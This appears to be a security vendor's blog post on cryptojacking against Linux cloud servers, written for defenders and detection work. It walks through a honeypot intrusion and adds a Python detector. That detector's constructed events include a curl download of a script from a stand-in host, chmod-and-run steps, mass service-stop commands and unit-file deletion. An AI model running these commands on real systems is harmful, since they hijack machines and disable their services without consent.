Defending Linux-Based Clouds from Cryptojacking


2021 saw a marked rise – 35% – in malware targeting Linux systems. To anyone familiar with recent trends in business cloud migration, this should come as no surprise. 

Between 2017 and 2021, the global cloud storage market more than doubled from $30 billion to $76 billion and is projected to balloon to $390 billion by 2028. By the end of 2021, 94% of enterprises were running workloads in the cloud. For malware designers, the explosion of cloud use and remote access points has opened a lucrative window of opportunity.

90% of clouds run on Linux, but the cybersecurity industry remains focused on handling Windows-based threats. In the meantime, attackers – cryptominers in particular – are taking advantage of this expanding and largely undefended attack surface to skim quick cash off the unprepared. Already Palo Alto Networks has found Linux-based cryptojacking operations on 23% of business cloud infrastructures.


Cryptominers and Linux

[Screenshot: Cryptojacking 1]

This screenshot from Spyderbat presents a real cryptojacking attack captured from one of our honeypots. The target is a patched Linux cloud droplet with only the SSH service exposed, protected by a weak user password. It was popped within minutes.

Using Spyderbat, we can see exactly what the attacker does and the outcomes from the script executed:

1. After logging in, the cryptojacker downloads a script and makes it executable, then executes the script.

2. The first stage of the script is to run a series of commands to learn about the system and disable running services, such as:

/bin/grep -c processor /proc/cpuinfo
/sbin/sysctl -w vm.nr_hugepages=3
/usr/bin/systemctl stop filesystem.service
/usr/bin/systemctl stop fbackup.service
/bin/systemctl stop vsphereui.service
/usr/bin/systemctl stop vsphere.service

[Screenshot: Cryptojacking 2]

3. The next stage of the script removes files (such as service configuration files and libexec executables), then identifies and stops a long list of running processes.

[Screenshot: Cryptojacking 3]

4. The last stage of the script downloads several executables, libraries, and JSON content, and reloads itself as a service.
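The four stages above form a recognisable sequence: a download-chmod-execute chain, CPU enumeration, a huge-pages sysctl tweak (a common miner performance setting), a burst of `systemctl stop` commands, unit-file removal, and re-installation as a service. The following is an added example, not Spyderbat's code or the honeypot's actual data: a small Python detector that replays constructed process-execution events modelled on those stages and scores the session against these indicators. The event fields, the regexes, the weights and the alert threshold are all assumptions chosen for illustration; a real deployment would feed it from an EDR or auditd execve stream.

```python
import re
from collections import defaultdict
from dataclasses import dataclass


@dataclass(frozen=True)
class Event:
    """One process execution. Fields are an assumed minimal schema."""
    ts: int      # seconds since session start (constructed)
    pid: int
    ppid: int
    exe: str     # resolved executable path
    argv: str    # full command line


# Single-event indicators: name -> (weight, regex over argv). Weights are assumptions.
SINGLE = {
    "cpu_enum":     (1, re.compile(r"\bgrep\b.*\bprocessor\b.*/proc/cpuinfo")),
    "hugepages":    (3, re.compile(r"\bsysctl\b.*\bvm\.nr_hugepages=")),
    "unit_removed": (2, re.compile(r"\brm\b.*\.service\b")),
    "persist":      (3, re.compile(r"\bsystemctl\b.*\benable\b")),
}
STOP_RE = re.compile(r"\bsystemctl\b\s+stop\s+(\S+)")
FETCH_RE = re.compile(r"\b(curl|wget)\b.*?(\S+)$")   # assumes the URL is the last token
CHMOD_RE = re.compile(r"\bchmod\b\s+\+x\s+(\S+)")

WEIGHTS = {name: w for name, (w, _) in SINGLE.items()}
WEIGHTS.update({"mass_service_stop": 3, "download_exec": 3})
ALERT_THRESHOLD = 6   # assumption: two strong indicators together raise an alert


def basename(path: str) -> str:
    return path.rsplit("/", 1)[-1]


def find_indicators(events):
    """Return {indicator_name: [events that triggered it]} for one session."""
    hits = defaultdict(list)
    stops_by_parent = defaultdict(list)
    fetched, chmodded = set(), set()   # basenames downloaded / made executable so far
    for ev in sorted(events, key=lambda e: e.ts):
        for name, (_, rx) in SINGLE.items():
            if rx.search(ev.argv):
                hits[name].append(ev)
        if STOP_RE.search(ev.argv):
            stops_by_parent[ev.ppid].append(ev)
        m = FETCH_RE.search(ev.argv)
        if m:
            fetched.add(basename(m.group(2)))
        m = CHMOD_RE.search(ev.argv)
        if m and basename(m.group(1)) in fetched:
            chmodded.add(basename(m.group(1)))
        # Stage 1 of the post: a file downloaded and chmod'ed in this session is executed
        tokens = ev.argv.split()
        target = basename(tokens[-1]) if tokens else ""
        ran_via_shell = ev.exe.endswith(("bash", "sh")) and target in chmodded
        if ran_via_shell or basename(ev.exe) in chmodded:
            hits["download_exec"].append(ev)
    # Stage 2 of the post: a burst of service stops from one parent (>= 3 within 60 s)
    for evs in stops_by_parent.values():
        if len(evs) >= 3 and evs[-1].ts - evs[0].ts <= 60:
            hits["mass_service_stop"].extend(evs)
    return dict(hits)


def assess(events):
    """Score a session: each distinct indicator contributes its weight once."""
    hits = find_indicators(events)
    score = sum(WEIGHTS[n] for n in hits)
    return {"indicators": sorted(hits), "score": score, "alert": score >= ALERT_THRESHOLD}


# Constructed session modelled on the stages in the post (not real honeypot data).
ATTACK_EVENTS = [
    Event(1, 2001, 1, "/usr/sbin/sshd", "sshd: dev [priv]"),
    Event(2, 2010, 2001, "/bin/bash", "-bash"),
    Event(3, 2011, 2010, "/usr/bin/curl", "curl -sO http://example.invalid/x.sh"),
    Event(4, 2012, 2010, "/bin/chmod", "chmod +x x.sh"),
    Event(5, 2013, 2010, "/bin/bash", "bash ./x.sh"),
    Event(6, 2014, 2013, "/bin/grep", "grep -c processor /proc/cpuinfo"),
    Event(7, 2015, 2013, "/sbin/sysctl", "sysctl -w vm.nr_hugepages=3"),
    Event(8, 2016, 2013, "/usr/bin/systemctl", "systemctl stop filesystem.service"),
    Event(9, 2017, 2013, "/usr/bin/systemctl", "systemctl stop fbackup.service"),
    Event(10, 2018, 2013, "/bin/systemctl", "systemctl stop vsphereui.service"),
    Event(11, 2019, 2013, "/usr/bin/systemctl", "systemctl stop vsphere.service"),
    Event(12, 2020, 2013, "/bin/rm", "rm -f /etc/systemd/system/fbackup.service"),
    Event(13, 2021, 2013, "/usr/bin/systemctl", "systemctl daemon-reload"),
    Event(14, 2022, 2013, "/usr/bin/systemctl", "systemctl enable --now x.service"),
]

# Constructed benign admin session: one service restart should not alert.
BENIGN_EVENTS = [
    Event(1, 3001, 1, "/usr/sbin/sshd", "sshd: dev [priv]"),
    Event(2, 3010, 3001, "/bin/bash", "-bash"),
    Event(3, 3011, 3010, "/usr/bin/systemctl", "systemctl stop nginx.service"),
    Event(4, 3012, 3010, "/usr/bin/apt", "apt install -y nginx"),
    Event(5, 3013, 3010, "/usr/bin/systemctl", "systemctl start nginx.service"),
]

if __name__ == "__main__":
    print("attack:", assess(ATTACK_EVENTS))
    print("benign:", assess(BENIGN_EVENTS))
```

Scoring distinct indicators rather than raw event counts keeps a single `systemctl stop` from an administrator below the threshold while the combination the post describes scores well above it; the window-and-count rule for `mass_service_stop` is the knob to tune against your own fleet's maintenance activity.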
